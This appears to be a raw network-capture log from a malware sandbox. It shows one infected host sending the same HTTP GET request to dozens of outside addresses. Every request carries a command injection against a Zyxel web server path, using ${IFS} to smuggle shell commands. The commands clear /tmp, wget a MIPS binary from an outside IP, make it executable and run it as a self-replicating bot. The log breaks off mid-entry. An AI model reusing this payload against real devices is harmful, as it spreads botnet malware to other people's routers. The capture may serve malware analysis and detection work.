                                              Jan 29, 2024 07:04:02.257740974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7473192.168.2.1434366126.46.50.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257776022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7474192.168.2.1446090152.152.253.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257818937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7475192.168.2.1459802104.115.115.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257858992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7476192.168.2.145980695.55.90.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257910013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7477192.168.2.144313841.246.249.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257936954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7478192.168.2.1435110121.79.2.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.257977962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7479192.168.2.1448254170.152.29.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258017063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7480192.168.2.1453348148.17.14.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258059978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7481192.168.2.1439586162.69.57.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258090019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7482192.168.2.144741686.92.85.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258116007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7483192.168.2.1438828129.195.98.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258141994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7484192.168.2.146097659.230.102.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258209944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7485192.168.2.144801857.189.65.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258219004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7486192.168.2.1440088195.172.151.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258275032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7487192.168.2.1447772205.196.1.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258315086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7488192.168.2.1447968126.178.153.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258336067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7489192.168.2.1456672200.93.124.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258378029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7490192.168.2.1453306192.154.173.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258409023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7491192.168.2.145118452.140.195.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258438110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7492192.168.2.145717440.68.30.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258481026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7493192.168.2.1437822132.1.119.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258513927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7494192.168.2.144549280.203.45.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258541107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7495192.168.2.1453846167.203.136.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258583069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7496192.168.2.146045819.245.216.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258615017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7497192.168.2.144584039.158.147.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258651972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7498192.168.2.1442164182.209.6.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258682013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7499192.168.2.1442472132.111.76.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258713961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7500192.168.2.145627634.50.238.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258737087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7501192.168.2.145757461.161.52.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258780956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7502192.168.2.1453604170.90.110.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258831978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7503192.168.2.144472237.8.49.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258860111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7504192.168.2.1447310207.23.201.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258882046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7505192.168.2.1451192195.11.160.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258933067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7506192.168.2.145976638.130.55.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258941889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7507192.168.2.143895885.25.237.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.258985043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7508192.168.2.1440660113.35.109.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259015083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7509192.168.2.144375892.41.167.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259047031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7510192.168.2.1438686204.163.230.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259099007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7511192.168.2.145085251.194.103.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259134054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7512192.168.2.1442446107.216.13.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259159088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7513192.168.2.144673849.197.37.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259217024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7514192.168.2.1460006219.216.133.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259248972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7515192.168.2.143815459.198.43.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259298086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7516192.168.2.1460472122.5.246.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259331942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7517192.168.2.144607284.39.120.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259362936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7518192.168.2.1452018196.200.139.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259394884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7519192.168.2.1445628196.58.145.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259432077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7520192.168.2.1452294195.29.153.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259473085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7521192.168.2.1435742212.120.214.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259522915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7522192.168.2.1437180202.144.166.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259557009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7523192.168.2.143954640.79.115.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259612083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7524192.168.2.1435612157.192.128.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259653091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7525192.168.2.145787213.155.88.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259705067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7526192.168.2.144840683.255.135.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259721041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7527192.168.2.1441842143.174.246.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259783030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7528192.168.2.144305482.2.255.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259814024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7529192.168.2.1444680208.54.103.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259859085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7530192.168.2.1451212122.207.197.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259891987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7531192.168.2.145203219.157.94.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259947062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7532192.168.2.1459434205.226.206.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.259980917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7533192.168.2.1438396131.77.87.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260023117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7534192.168.2.145209497.193.192.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260055065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7535192.168.2.145955446.199.132.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.260106087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7536192.168.2.1442796147.113.84.126443
                                              TimestampBytes transferredDirectionData
